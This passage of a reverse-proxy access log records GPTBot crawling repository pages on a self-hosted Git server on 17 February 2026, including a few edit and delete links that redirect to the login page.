5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 20762] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14390] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11060] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:16:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:16:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:16:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13546] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:16:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11620] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14409] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/index.html" -[17/Feb/2026:16:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14378] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" -[17/Feb/2026:16:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14407] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" -[17/Feb/2026:16:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 13221] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" -[17/Feb/2026:16:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7794] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" -[17/Feb/2026:16:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10204] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10429] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10217] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11046] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:23:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/update_status.py" -[17/Feb/2026:16:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11897] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:23:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/update_status.py" -[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17037] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17039] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11896] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11011] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17964] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11084] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 